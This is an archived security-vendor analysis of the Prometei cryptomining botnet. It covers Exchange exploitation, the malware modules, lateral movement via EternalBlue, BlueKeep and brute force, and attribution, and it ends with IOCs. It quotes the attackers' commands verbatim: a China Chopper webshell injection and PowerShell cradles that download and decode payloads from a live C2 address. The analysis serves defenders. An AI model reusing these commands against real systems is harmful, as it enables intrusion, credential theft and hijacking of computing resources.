{ "id": "0f9673e8-3e21-4810-8975-b91d0b48c5fe", "created_at": "2026-04-06T00:13:59.242462Z", "updated_at": "2026-04-10T03:37:36.82395Z", "deleted_at": null, "sha1_hash": "8d7ccb515b66bbe8b1b0977ed512bf3a61924ea1", "title": "Prometei Botnet Exploiting Microsoft Exchange Vulnerabilities", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4452264, "plain_text": "Prometei Botnet Exploiting Microsoft Exchange Vulnerabilities\r\nBy Lior Rochberger\r\nArchived: 2026-04-05 23:11:48 UTC\r\nRecently, the Cybereason Nocturnus Team responded to several incident response (IR) cases involving infections of the\r\nPrometei Botnet against companies in North America, observing that the attackers exploited recently published Microsoft\r\nExchange vulnerabilities (CVE-2021-27065 and CVE-2021-26858) in order to penetrate the network and install malware.\r\nPrometei is a modular and multi-stage cryptocurrency botnet that was first discovered in July 2020 which has both Windows\r\nand Linux versions. To achieve their goal of mining Monero coins, Prometei uses different techniques and tools, ranging\r\nfrom Mimikatz to SMB and RDP exploits and other tools that all work together to propagate across the network.\r\nAlthough Prometei was officially discovered in mid-2020, the Cybereason Nocturnus Team found evidence that Prometei\r\nmight date back as far as 2016 and has been evolving ever since, adding new modules and techniques to its capabilities. The\r\nlatest versions of Prometei now provide the attackers with a sophisticated and stealthy backdoor that supports a wide range\r\nof tasks that make mining Monero coins the least of the victims' concerns.\r\nThis report will present the findings of our investigation of the attacks, including the initial foothold sequence of the\r\nattackers, the functionality of the different components of the malware, the threat actors’ origin and the bot’s infrastructure.\r\nKey Findings\r\n• Exploiting Microsoft Exchange Vulnerabilities: Prometei exploits the recently disclosed Microsoft Exchange\r\nvulnerabilities associated with the HAFNIUM attacks to penetrate the network for malware deployment, credential\r\nharvesting and more.\r\n• Wide range of Victims: The victimology is quite random and opportunistic rather than highly targeted, which makes it\r\neven more dangerous and widespread. Prometei has been observed to be active in systems across a variety of industries,\r\nincluding: Finance, Insurance, Retail, Manufacturing, Utilities, Travel, and Construction. It has been observed infecting\r\nnetworks in the U.S., UK and many other European countries, as well as countries in South America and East Asia. It was\r\nalso observed that the threat actors appear to be explicitly avoiding infecting targets in former Soviet bloc countries.\r\n• Exploiting SMB and RDP Vulnerabilities: The main objective of Prometei is to install the Monero miner component on\r\nas many endpoints as it can. To do so, Prometei needs to spread across the network - and for that, it uses many techniques\r\nsuch as known exploits EternalBlue and BlueKeep, harvesting credentials, exploiting SMB and RDP exploits, and other\r\ncomponents such as SSH client and SQL spreader.\r\n• Cross-Platform Threat: Prometei has both Windows-based and Linux-Unix based versions, and it adjusts its payload\r\nbased on the detected operating system, on the targeted infected machines when spreading across the network.\r\n• Cybercrime with APT Flavor: Threat actors in the cybercrime community continue to adopt APT-like techniques and\r\nimprove the efficiency of their operations. It is assessed that the Prometei group is financially motivated and operated by\r\nRussian-speaking individuals but is not backed by a nation-state. By exploiting the computing resources of multiple\r\nendpoints to mine bitcoin, the threat actors behind Prometei can earn hefty sums of cryptocurrency over time.\r\n• Resilient C2 Infrastructure: Prometei is built to interact with four different command and control (C2) servers which\r\nstrengthens the botnet’s infrastructure and maintains continuous communications, making it more resistant to takedowns.\r\n• Older than it Seems: The Prometei Botnet was first discovered in July 2020, but new evidence shows it was seen in the\r\nwild as far back as 2016. The Prometei Botnet is continuously evolving, with new features and tools observed in the newer\r\nversions.\r\nhttps://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities\r\nPage 1 of 17\n\nAttack sequence diagram\r\nInitial Compromise: Exploitation of the Microsoft Exchange Vulnerability\r\nDuring the IR investigation, the Nocturnus Team was able to identify the initial compromise vector, in which the attackers\r\nexploited the recently discovered vulnerabilities in Microsoft Exchange server, which allowed them to perform remote code\r\nexecution by exploiting the following CVEs: CVE-2021-27065 and CVE-2021-26858.\r\nThe attackers used this vulnerability to install and execute the China Chopper webshell via the following commands:\r\nSet-OabVirtualDirectory with the Parameters: -ExternalUrl \"http://f/\u003cscript language=\"JScript\" runat=\"server\"\u003efunction\r\nPage_Load(){eval(Request[\"NO9BxmCXw0JE\"],\"unsafe\");}\u003c/script\u003e\" -Identity \"OAB (Default Web Site)\"\r\n$d=\r\n[System.Convert]::FromBase64String('PCVAIFBhZ2UgTGFuZ3VhZ2U9IkMjIiBFbmFibGVWaWV3U3RhdGU9ImZhbHNlIiAlPg0KPCVAIEltcG9yd\r\n[io.file]::WriteAllBytes('C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\\u003cfile_name\u003e.aspx',$d);\r\nhttps://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities\r\nPage 2 of 17\n\nOnce the attackers gained access to the network, they deleted the .aspx webshell file to cover their tracks:\r\ncmd.exe /c del \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\\\frontend\\httpproxy\\owa\\auth\\\u003cfile_name\u003e.aspx\"\r\nUsing the webshell, the attackers launched a PowerShell that was then used to download a payload from the following\r\nURL: \r\nhttp://178.21.164[.]68/dwn.php?b64=1\u0026d=nethost64C.exe\u0026B=_AMD64,\u003cmachine_name\u003e\r\nThe payload is then saved as C:\\windows\\zsvc.exe and executed. This is the start of the Prometei botnet execution:\r\nAttack tree of the initial infection vector as observed in the Cybereason XDR Platform\r\nThe Prometei Botnet \r\nWhen the first module of the botnet, zsvc.exe, is executed, it starts to “prepare the ground” for the other modules:\r\nIt copies itself into C:\\Windows with the name “sqhost.exe”\r\nIt uses Netsh commands to add a firewall rule that will allow sqhost.exe to create connections over\r\nHTTP\r\nIt checks if there is a registry key named “UPlugPlay”, and if present it deletes it\r\nIt sets a registry key for persistence as\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\UPlugPlay with the image path and\r\ncommand line c:\\windows\\sqhost.exe Dcomsvc\r\nIt creates several registry keys under SOFTWARE\\Microsoft\\Fax\\ and SOFTWARE\\Intel\\support\\ with\r\nthe names MachineKeyId, EncryptedMachineKeyId and CommId, for later use by the different\r\ncomponents for C2 communication.\r\nSqhost.exe\r\nSqhost.exe is the main bot module, complete with backdoor capabilities that support a wide range of commands. Sqhost.exe\r\nis able to parse the prometei.cgi file from 4 different hardcoded command and control servers. The file contains the\r\ncommand to be executed on the machine. The commands can be used as “stand-alone” native OS commands (cmd\r\ncommands, WMI, etc.) or can be used to interact with the other modules of the malware located under C:\\Windows\\dell\r\nhttps://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities\r\nPage 3 of 17\n\nEmbedded C2 domains in Sqhost.exe\r\nSqhost supports the following commands:\r\nCall - Execute a program or a file\r\nStart_mining - launch SearchIndexer.exe (the miner) with the file C:\\windows\\dell\\Desktop.dat as its parameters \r\nStart_mining1 - request C:\\windows\\dell\\Desktop.dat from the C2, and then launch SearchIndexer.exe (the miner)\r\nwith the file C:\\windows\\dell\\Desktop.dat as its parameters\r\nStop_mining - runs cmd.exe with command: “/c taskkill -f -im SearchIndexer.exe”\r\nWget - download a file\r\nXwget - download a file, save it, and use XOR to decrypt it\r\nQuit - terminate the bot execution using TerminateProcess\r\nQuit2 - terminate the bot execution without using TerminateProcess\r\nSysinfo - collect information about the machine (using native APIs and WMIC)\r\nExec - execute a command\r\nVer - return the bot version\r\nEnc - get/set the RC4 encryption key\r\nExtip - return the bot's external IP address\r\nChkport - check if a specific port is open\r\nSearch - search for files by name (potentially crypto currency wallets)\r\nSet_timeout - set a period of time for connecting to C2 server\r\nTouch - open a file\r\nTouch_internal - edit a file with a single byte to change access times\r\nTouch_stop - close a file\r\nUpdate - update the bot version\r\nSet_Autoexec2 - set an automatic execution\r\nSet_Autoexec1 - set an automatic execution\r\nSet_cc1 - set a C2 server\r\nSet_cc0 - set a C2 server\r\nhttps://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities\r\nPage 4 of 17\n\nSome of the tasks supported by Sqhost.exe\r\nThe execution of the malware encountered in the investigation shows activities performed by the attackers which included\r\ntree processes: cmd.exe, sqhost.exe and wmic.exe:\r\nAttack tree of the infection as observed in the Cybereason Defense platform\r\nCMD.exe: was used to execute the following commands (some of the commands are broken into individual commands for\r\nreadability):\r\nAuditpol /set /subcategory:\"Logon\" /failure:enable\r\nConfiguring\r\nMicrosoft Windows\r\nServer to log all\r\nfailed logons using\r\nauditpol\r\nnetsh advfirewall firewall delete rule name=\"Banned brute IPs\"\r\nnetsh advfirewall firewall add rule name=\"Banned brute IPs\" dir=in interface=any\r\naction=block\r\nlocalip=68.12.114.202,71.181.80.24,179.52.245.208,24.0.176.79,68.161.157.243,\r\nBlocking certain IP\r\naddresses from\r\ncommunicating with\r\nthe machine. We\r\nassess that those IP\r\nhttps://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities\r\nPage 5 of 17\n\nnetsh advfirewall firewall add rule name=\"Banned brute IPs\" dir=in interface=any\r\naction=block\r\nremoteip=68.12.114.202,71.181.80.24,179.52.245.208,24.0.176.79,68.161.157.243,\r\naddresses are used\r\nby other malware,\r\npotentially Miners,\r\nand the attackers\r\nbehind Prometei\r\nwanted to ensure\r\nthat all the resources\r\nof the network are\r\navailable just for\r\nthem.\r\npowershell.exe \"if(-not (Test-Path 'C:\\windows\\ExchDefender.exe')) {$b64=$(New-Object\r\nNet.WebClient).DownloadString('http://178.21.164.68/dwn.php?\r\nd=ExchDefender.exe\u0026b64=1');$data=[System.Convert]::FromBase64String($b64);$bt=New-Object Byte[]($data.Length);[int]$j=0;FOR([int]$i=0;$i -lt $data.Length; $i++)\r\n{$j+=66;$bt[$i]=(((($data[$i]) -bxor (($i*3) -band 0xFF))-$j) -band 0xFF);}\r\n[io.file]::WriteAllBytes('C:\\windows\\dell\\ExchDefender.exe',$bt);}\"\r\nDownloading\r\nExchDefender.exe,\r\nan additional\r\nmodule of the botnet\r\ninto\r\nC:\\\\Windows\\dell\r\nand executes it.\r\npowershell.exe \"if(-not (Test-Path 'rdpcIip.exe')) {$b64=$(New-Object\r\nNet.WebClient).DownloadString('http://178.21.164.68/walk278_64.php');$data=\r\n[System.Convert]::FromBase64String($b64);$bt=New-Object Byte[]($data.Length);\r\n[int]$j=0;FOR([int]$i=0;$i -lt $data.Length; $i++){$j+=66;$bt[$i]=(((($data[$i]) -bxor (($i*3) -\r\nband 0xFF))-$j) -band 0xFF);}\r\n[io.file]::WriteAllBytes('rdpcIip.exe',$bt);}\"\u0026C:\\Windows\\svchost.exe /sha1chk\r\n381C17131D13E1203C91720870ECB441F5BE297E miwalk.exe\u0026sqhost.exe /sha1chk\r\n381C17131D13E1203C91720870ECB441F5BE297E miwalk.exe\u0026C:\\Windows\\svchost.exe\r\n/sha1chk 9623DCD8836C481AA44AE84499F20E2439941A4B rdpcIip.exe\u0026sqhost.exe\r\n/sha1chk 9623DCD8836C481AA44AE84499F20E2439941A4B rdpcIip.exe\u0026rdpcIip.exe\r\nDownloading\r\nrdpcIip.exe, an\r\nadditional module of\r\nthe botnet into\r\nC:\\\\Windows and\r\nexecutes it.\r\ntaskkill -f -im rdpcIip.exe\u0026del rdpcIip.exe\u0026powershell.exe \"if(-not (Test-Path '7z.dll')) {(New-Object Net.WebClient).DownloadFile('http://178.21.164.68/7z.dll','7z.dll');}if(-not (Test-Path\r\n'7z.exe')) {(New-Object Net.WebClient).DownloadFile('http://178.21.164.68/7z.exe','7z.exe');}\r\n(New-Object\r\nNet.WebClient).DownloadFile('http://178.21.164.68/netwalker2.7z','netwalker.7z');\"\u00267z x\r\nnetwalker.7z -phorhor123 -y\u0026del netwalker.7z\r\nDownloading 7z.exe\r\nand an archived file,\r\nNetwalker.7z and\r\nuse the 7zip\r\nexecutable to extract\r\nthe files in the\r\narchive.\r\ntaskkill -f -im rdpcIip.exe\u0026ping -n 3 127.0.0.1\u0026C:\\Windows\\svchost.exe /sha1chk\r\n9623DCD8836C481AA44AE84499F20E2439941A4B rdpcIip.exe\u0026sqhost.exe /sha1chk\r\n9623DCD8836C481AA44AE84499F20E2439941A4B rdpcIip.exe\u0026powershell.exe \"if(-not\r\n(Test-Path 'miwalk.exe')) {$b64=$(New-Object\r\nNet.WebClient).DownloadString('http://178.21.164.68/mi64.php');$data=\r\n[System.Convert]::FromBase64String($b64);$bt=New-Object Byte[]($data.Length);\r\n[int]$j=0;FOR([int]$i=0;$i -lt $data.Length; $i++){$j+=66;\r\ntaskkill -f -im rdpcIip.exe\u0026ping -n 3 127.0.0.1\u0026C:\\Windows\\svchost.exe /sha1chk\r\n9623DCD8836C481AA44AE84499F20E2439941A4B rdpcIip.exe\u0026sqhost.exe /sha1chk\r\n9623DCD8836C481AA44AE84499F20E2439941A4B rdpcIip.exe\u0026powershell.exe \"if(-not\r\n(Test-Path 'miwalk.exe')) {$b64=$(New-Object\r\nNet.WebClient).DownloadString('http://178.21.164.68/mi64.php');$data=\r\n[System.Convert]::FromBase64String($b64);$bt=New-Object Byte[]($data.Length);\r\n[int]$j=0;FOR([int]$i=0;$i -lt $data.Length; $i++){$j+=66;$bt[$i]=(((($data[$i]) -bxor (($i*3) -\r\nband 0xFF))-$j) -band 0xFF);}[io.file]::WriteAllBytes('miwalk.exe',$bt);}\"\r\nDownloading\r\nmiwalk.exe, an\r\nadditional module of\r\nthe botnet into\r\nC:\\\\Windows\\.\r\nIn addition, it appears the attackers attempted to execute C:\\Windows\\svchost.exe, which is the same file as sqhost.exe, and\r\nthe attackers named it as svchost in earlier versions, but it wasn’t downloaded in the attack or in existence by this name. The\r\nreference for “svchost.exe” resides in different components of the malware, sometimes even in addition to “sqhost”. Our\r\nassumption is that it is used either for backwards-compatibility or it is the case that the attackers didn’t bother to change it in\r\nsome places after renaming the main bot module to “sqhost.exe”.\r\nSqhost.exe: executed with “-watchdog” parameter, to make sure that it will keep running on the system.\r\nWmic.exe: was used to perform reconnaissance commands:\r\nhttps://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities\r\nPage 6 of 17\n\n- wmic ComputerSystem get Model\r\n- wmic OS get lastbootuptime\r\n- wmic baseboard get product\r\n- wmic os get caption\r\nExchDefender.exe\r\nExchdefender tries to masquerade as a “Microsoft Exchange Defender”, a non-existent program that masquerades as a\r\nlegitimate Microsoft product. \r\nWhen first executed, it creates a service named “Microsoft Exchange Defender” [MSExchangeDefenderPL] that is set to\r\nexecute the binary (from C:\\Windows) with the same command line as seen used with sqhost.exe - “Dcomsvc”:\r\nOutput of running Exchdefender.exe\r\nService name and command line used to execute Exchdefender.exe\r\nExchdefender constantly checks the files within the directory C:\\Program Files\\Microsoft\\Exchange\r\nServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth, a known directory to be used to host WebShells. The malware is specifically\r\ninterested in the file “ExpiredPasswords.aspx” which was reported to be the name used to obscure the HyperShell backdoor\r\nused by APT34 (aka. OilRig). If the file exists, the malware immediately deletes it.\r\nOur assessment is that this tool is used to “protect” the compromised Exchange Server by deleting potential WebShells so\r\nPrometei will remain the only malware using its resources.\r\nSearchIndexer.exe\r\nSearchIndexer.exe is an open source Monero mining software (XMRig miner). It is executed with the content from\r\n“desktop.dat” file as a parameter, which contains the mining server and the username for the mining server:\r\nContent of Desktop.dat\r\nFollowing the investigation, it appears that the user is “banned due to reports of botnet mining” from around March 2021,\r\nand it’s very likely that the attackers have changed the user already:\r\nA massage showing that the user was banned\r\nNetwalker.7z\r\nhttps://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities\r\nPage 7 of 17\n\nThe Netwalker.7z archive downloaded from the C2 178.21.164[.]68 is password protected, using the password “horhor123”.\r\nThe content of the archive is saved under C:\\Windows\\dell, together with the other components of the bot. The archive\r\ncontains the following files: Nethelper2.exe, Nethelper4.exe, Windrlver.exe, a few DLLs,a copy of RdpcIip.exe and a few\r\nDLLs used by the bot components:\r\nContent of Netwalker.7z\r\nRdpcIip.exe\r\nRdcIip.exe (with a capital “I” instead of a lowercase “L”) is both downloaded directly by sqhost.exe and is also contained in\r\nthe Netwalker.7z archive\". It is a key component of the malware. It has huge (trust us, huge) functionality with different\r\nbranches with the main purpose being to interact with other components of the malware and make them work all together.\r\nRdpcIip is responsible for some of the most important functions of the malware - harvesting credentials (using another\r\ncomponent called Miwalk.exe) and spreading across the network using the stolen credentials as well as using the SMB\r\nexploit EternalBlue and the RDP exploit BlueKeep.\r\nHarvesting Credentials For Spreading\r\nTo harvest credentials, RdpcIip.exe launches another component, Miwalk.exe, a customized version of Mimikatz. The\r\noutput is saved to ssldata2.dll and ssldata2_old.dll, which are text files, and RdpcIip reads those files and tries to validate the\r\ncredentials and use them for spreading across the network. \r\nIn addition, RdpcIip.exe also changes the following registry key to 1 so the credentials are stored in memory and retrieved\r\nusing techniques employed by Miwalk.exe: \r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential\r\nChanging the registry key “UseLogonCredential”\r\nReading the contents of ssldata2.dll and ssldata2_old.dll\r\nIn addition to using the harvested credentials, RdpcIip also tries to spread across the network by brute-forcing the usernames\r\nand passwords using a built-in list of common combinations:\r\nhttps://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities\r\nPage 8 of 17\n\nA list of common usernames and passwords embedded in RdpcIip.exe\r\nNetwork Spreading by Exploiting Vulnerabilities\r\nIf RdpcIip can’t spread to other machines using the stolen credentials, it uses the EternalBlue exploit and sends a shellcode\r\nto install and launch the main bot module Sqhost.exe. To use the exploit, the malware downgrades the SMB protocol to\r\nSMB1, which is vulnerable to the exploit:\r\nDowngrading the SMB protocol to version 1\r\nTo use the RDP exploit BlueKeep, the malware uses another component, Bklocal2.exe / Bklocal4.exe (Depending on the OS\r\nversion), which is also downloaded by Sqhost and located in C:\\Windows\\dell:\r\nhttps://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities\r\nPage 9 of 17\n\nExecuting the BlueKeep exploit binaries\r\nPreparing the Ground for Other Components\r\nRdpcIip also prepares the ground for other components of the bot such as Nethelper, the SQL spreader, Windrlver, and the\r\nSSH client.\r\nIt checks if the dependencies for the files are all set, including Mono.security.dll and Npgsql.dll. If not, it will download and\r\ncopy the files to the right folder. Eventually, RdpcIip will execute the components as child processes and use them for its\r\nmain purpose - spreading:\r\nPreparing the ground for Nethelper\r\nNethelper2.exe and Nethelper4.exe\r\nhttps://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities\r\nPage 10 of 17\n\nNetHelper is a .NET-based executable that is obfuscated using CryptoObfuscator protector. The main purpose of this module\r\nis to create connections to SQL servers in the network and try to infect them with the main module, Sqhost.\r\nTo do so, the malware uses the Npgsql library, a .Net data provider for PostgreSQL, and Mono, a software platform designed\r\nto allow developers to easily create cross platform applications. It checks the arguments received which contain the SQL\r\nserver found in the network and credentials harvested before. The malware then tries to create connection to the server using\r\nport 1433 (default for SQL servers) and 5432 (used for PostgreSQL):\r\nCreates connection to SQL server on port 1433\r\nCreates connection to PostgreSQL server on port 5432\r\nIf successful, the malware checks the operating system of the SQL server, and operate accordingly:\r\nIf the OS is Windows - uses PowerShell command to download “zsvc.exe” (Sqhost.exe):\r\nDownloading Prometei main module on a windows machine using PowerShell\r\nIf the OS is Unix based - uses one of the following: Curl / Wget / Nexec:\r\nhttps://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities\r\nPage 11 of 17\n\nDownloading Prometei main module on a Unix based machine using different methods\r\nWindrlver.exe\r\nWindlver.exe (with a lowercase “L” and not a capital “i”) is an OpenSSH and SSLib-based software that the attackers have\r\ncreated so they can spread across the network using SSH. Since it’s used for spreading, it is launched by the spreader\r\ncomponent RdpcIip, and downloaded as part of the Netwalker.7z archive. \r\nWhen launched, the remote server is passed as a parameter, and it tries to login to the servers using the stolen credentials and\r\nusing a predefined list of usernames and passwords (the same list in RdpcIip, since it is the component that executes\r\nWindrlver). In addition, it also tries default servers usernames such as: root, admin, user and netup123 (the default user for\r\nNetUP servers):\r\nDifferent usernames used to login to remote servers by Windrlver\r\nIf successful, the bot will try to copy and execute the main bot module Sqhost.exe on the remote server.\r\nInfrastructure And Tools\r\nPrometei, same as other botnets, has a diverse infrastructure designed to ensure the botnet is alive and infected machines\r\nstay part of the botnet. Over the years, different Prometei C2 servers were taken down by authorities, and the attackers had\r\nto constantly work their way around it. We assess that this is one of the reasons why the main bot contains not just one, but\r\nfour different C2 servers in the newer versions.\r\nPrometei botnet tries to hide it’s malicious activities by masquerading different components as native OS processes,\r\nsometimes using the name of the file as-is. For example, the Sqhost.exe file is sometimes purposely misspelled to make it\r\nlook like another file,and RdpcIip.exe (with a capital “i” instead of a lowercase “L”) is used in the legitimate OS process\r\nname.\r\nBesides keeping the masquerading techniques from its early days, Prometei has also kept a consistent naming convention\r\nand URL pattern, which makes tracking its components and infrastructure relatively easy. For example, all the way back to\r\nthe first version analyzed by Cybereason, the attackers used the same file names, such as:\r\nC:\\dell\\searchindexer.exe\r\nC:\\dell\\desktop.dat\r\nC:\\Windows\\svchost.exe\r\nFor a full list of servers, see IOCs list.\r\nAll the Way Back to 2016\r\nAs mentioned previously, Prometei was discovered in July 2020, and according to the researcher who discovered it, the\r\nbotnet was active as early as the beginning of March 2020. Our research reveals that Prometei actually has been around\r\nhttps://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities\r\nPage 12 of 17\n\nsince at least 2016.\r\nFollowing the infrastructure of the botnet, most of which was taken down by authorities, we were able to find the following:\r\nA Prometei.cgi file that contains the command “ver” (show the bot version), which was found in the wild in May\r\n2016:\r\nVT screenshot: SHA-256: cf542ada135ee3edcbbe7b31003192c75295c7eff0efe7593a0a0b0f792d5256\r\nIn 2017, the attackers named the main component “download.exe” (later changed to “svchost.exe” and now\r\n“qhost.exe”). They also used a certificate to sign the binaries:\r\nVT screenshot: SHA-256: fdcf4887a2ace73b87d1d906b23862c0510f4719a6c159d1cde48075a987a52f\r\nEvery Tool and its Own PDB\r\nThe Prometei Botent evolved over the years by adding new tools and expanding its supported commands. In 2019, it appears\r\nthat the malware was significantly updated with a lot of tools added in a short period of time. In our analysis we didn’t go\r\nover all the tools, since the attackers don’t always use them all, and it can change from one attack to another. Our research\r\nrevealed a shared PDB pattern used for the tools, that also reveals some information about them, such as purpose and\r\nobfuscator used:\r\nC:\\WORK\\Tools_2019\\walker\\DOTNETPlugin\\pgbrute\\bin\\Release\\CryptoObfuscator_Output\\nethelper.pdb\r\nC:\\WORK\\Tools_2019\\walker\\bklocal\\BlueKeep\\bin\\Release\\CryptoObfuscator_Output\\BlueKeep.pdb\r\nC:\\Work\\Tools_2019\\walker\\netwalker\\x64\\Release\\rdpcIip.pdb\r\nC:\\Work\\Tools_2019\\prometei\\rdpexec\\psexec\\Release\\psexec.pdb\r\nC:\\Work\\Tools_2019\\prometei\\rdpexec\\shift - bot\\Release\\shift.pdb\r\nC:\\Work\\Tools_2019\\prometei\\scan_rdp\\rdp_checker\\MyRDP\\SampleRDC\\bin\\Release\\CryptoObfuscator_Output\\socks.pdb\r\nC:\\WORK\\Tools_2019\\prometei\\RDPBrute2016.NET\\RDPDetect\\bin\\Release\\CryptoObfuscator_Output\\nvsync.pdb\r\nC:\\WORK\\Tools_2019\\prometei\\nvstub\\Release\\nvstub.pdb\r\nC:\\Work\\Tools_2019\\prometei\\nvstub\\Release\\nvstub.pdb\r\nC:\\Work\\Tools_2019\\prometei\\scan_rdp\\rdp_checker\\RDPDetect\r\n(rdp_checker)\\RDPDetect\\bin\\Release\\CryptoObfuscator_Output\\nethost.pdb\r\nC:\\Work\\Tools_2019\\prometei\\psbrute\\Release\\psbrute.pdb\r\nC:\\Work\\Tools_2019\\prometei\\RDPBrute2016.NET\\RDPDetect\\bin\\Release\\CryptoObfuscator_Output\\nvsync.pdb\r\nhttps://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities\r\nPage 13 of 17\n\nC:\\Work\\Tools_2019\\prometei\\rdpexec\\shift - bot\\Release\\shift.pdb\r\nC:\\Work\\Tools_2019\\misc\\tor_hidden_svc\\darkread\\x64\\Release\\darkread.pdb\r\nC:\\Work\\Tools_2019\\misc\\util\\chk445\\Release\\chk445.pdb\r\nC:\\Work\\Tools_2019\\misc\\util\\crawler\\Release\\crawler.pdb\r\nThe Threat Actor\r\nNot much is known about the threat actor behind Prometei. We were able to collect evidence that suggests the threat actors\r\nare Russian speaking, and in addition it appears that they attempt to avoid infecting other Russians Speakers. We also can\r\nnot ignore the name of the bot - “Prometei”, which is the Russian word for Prometheus, the Titan god of fire from the Greek\r\nmythology. \r\nIn addition, in the older versions of the malware created back in 2016, there were a few samples of “svchost.exe” (the main\r\nbot module) that the author of the malware forgot to edit the “product name” and left it in Russian. Also, some of the files\r\nhave a language code “Russian”:\r\nSvchost.exe without proper metadata editing The language code of svchost.exe\r\nPrometei uses different modules, and not all of them are observed in use in every attack. One of the Prometei components is\r\nrelated to a TOR client installation on the infected machine used to communicate with a TOR C2. As part of the installation,\r\nthe malware also drops a configuration file (torrc) that is configured to avoid using several exit nodes, all in the Soviet\r\nUnion:\r\nContent of torrc file in the installation of the TOR client by Prometei\r\nIn addition, Prometei has another component named nvsync.exe that seems to be an older version of Nethelper, and it\r\ncontains a function that checks the stolen credentials to avoid certain targets, among them are “Guest” and “Other user” - in\r\nRussian: Гость, Другой пользователь:\r\n Function in nvsync.exe - a component of the Prometei bot\r\nConclusion\r\nAs shown in this report, Prometei is a complex and multistage botnet that, due to its stealthines and wide range of\r\ncapabilities, puts the compromised network at great risk. The different components work together to enable the malware to\r\nperform many tasks: credential harvesting, spreading across the network, establishing C2 communications and more. The\r\nmalware authors are able to add more modules and expand their capabilities easily, and potentially even shift to another\r\npayload objective, more destructive than just mining Monero.\r\nhttps://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities\r\nPage 14 of 17\n\nThreat actors in the cybercrime community continue to adopt APT-like techniques and improve efficiency of their\r\noperations. As observed in the recent Prometei attacks, the threat actors rode the wave of the recently discovered Microsoft\r\nExchange vulnerabilities and exploited them in order to penetrate targeted networks. We anticipate continued evolution of\r\nthe advanced techniques being used by different threat actors for different purposes, including cybercrime groups. This puts\r\ndefenders in a position where they should always be prepared, not only for APT and nation state actors, but also for\r\nadvanced cybercriminals  who try to emulate the big APT groups.\r\nAlthough the Prometei techniques and some of its components will likely be detected by security analysts, most of them will\r\nnot be immediately obvious to end-users, which highlights the importance of having a security team and products in place\r\nthat can detect these malicious operations. This threat poses a great risk for organizations, since the attackers have absolute\r\ncontrol over the infected machines, and if they wish so, they can steal information, infect the endpoints with other malware\r\nor even collaborate with ransomware gangs by selling the access to the infected endpoints. Lastly, since cryptomining can be\r\nresource-hogging, it can affect the performance and stability of critical servers and endpoints, ultimately affecting business\r\ncontinuity.\r\nWe would like to thank Matt Hart and Niamh O’Connor for their contribution to these investigation efforts.\r\nLOOKING FOR THE IOCs? CLICK ON THE CHATBOT DISPLAYED IN LOWER-RIGHT OF YOUR SCREEN.\r\nMITRE ATT\u0026CK BREAKDOWN\r\nInitial\r\nAccess\r\nExecution Persistence\r\nDefense\r\nEvasion\r\nCredential\r\nAccess\r\nDiscovery\r\nLateral\r\nMovement\r\nCommand\r\n\u0026 Control\r\nImpact\r\nExploit\r\nPublic-Facing\r\nApplication\r\nSystem\r\nServices\r\nCreate or\r\nModify\r\nSystem\r\nProcess:\r\nWindows\r\nService\r\nMasquerading\r\nCredentials\r\nfrom\r\nPassword\r\nStores\r\nSystem\r\nInformation\r\nDiscovery\r\nExploitation\r\nof Remote\r\nServices\r\nApplication\r\nLayer\r\nProtocol\r\nResource\r\nHijacking\r\n  Native API  \r\nValid\r\nAccounts\r\nOS\r\nCredential\r\nDumping\r\nSystem\r\nService\r\nDiscovery\r\nLateral Tool\r\nTransfer\r\nData\r\nEncoding\r\n \r\n \r\nWindows\r\nManagement\r\nInstrumentation\r\n   \r\nUnsecured\r\nCredentials\r\nNetwork\r\nShare\r\nDiscovery\r\n \r\nMulti-Stage\r\nChannels\r\n \r\n       \r\nBrute\r\nForce\r\nProcess\r\nDiscovery\r\n     \r\nPrometei Botnet | Indicators of Compromise\r\nIndicator Type Comment\r\nP1.feefreepool.net\r\nxmr.feefreepool.net\r\ngb7ni5rgeexdcncj.onion\r\nrongo.prohash.org\r\nbk1.bitspiritfun2.net\r\nmkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero\r\ndummy.zero\r\ncp22.umbrellapool.club\r\n193.160.102.91.in-addr.arpa\r\n102.72.239.193.in-addr.arpa\r\n183.247.34.37.in-addr.arpa\r\ncp23.umbrellapool.club\r\nbk2.bitspiritfun2.net\r\nDomain C2\r\nhttps://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities\r\nPage 15 of 17\n\n217.165.8.218\r\n77.92.138.51\r\n91.102.160.193\r\n103.11.244.221\r\n121.200.54.85\r\n112.109.89.53\r\n178.21.164.68\r\n69.84.240.57\r\n208.66.132.3\r\nIP C2\r\nf0a5b257f16c4ccff520365ebc143f09ccf233e642bf540b5b90a2bbdb43d5b4 SHA256\r\nSqhost.exe /\r\nzsvc.exe\r\nd8e3e22997533300c097b47d71feeda51dca183c35a0d818faa12ee903e969d5 SHA256 ExchDefender.exe\r\nb0e743517e7abf75a80b81bb7aadc9c166ac47ba89c0654ba855dda1e4d96c3e SHA256 SearchIndexer.exe\r\n55fc69a7e1b2371d8762be0b4f403d32db24902891fdbfb8b7d2b7fd1963f1b4 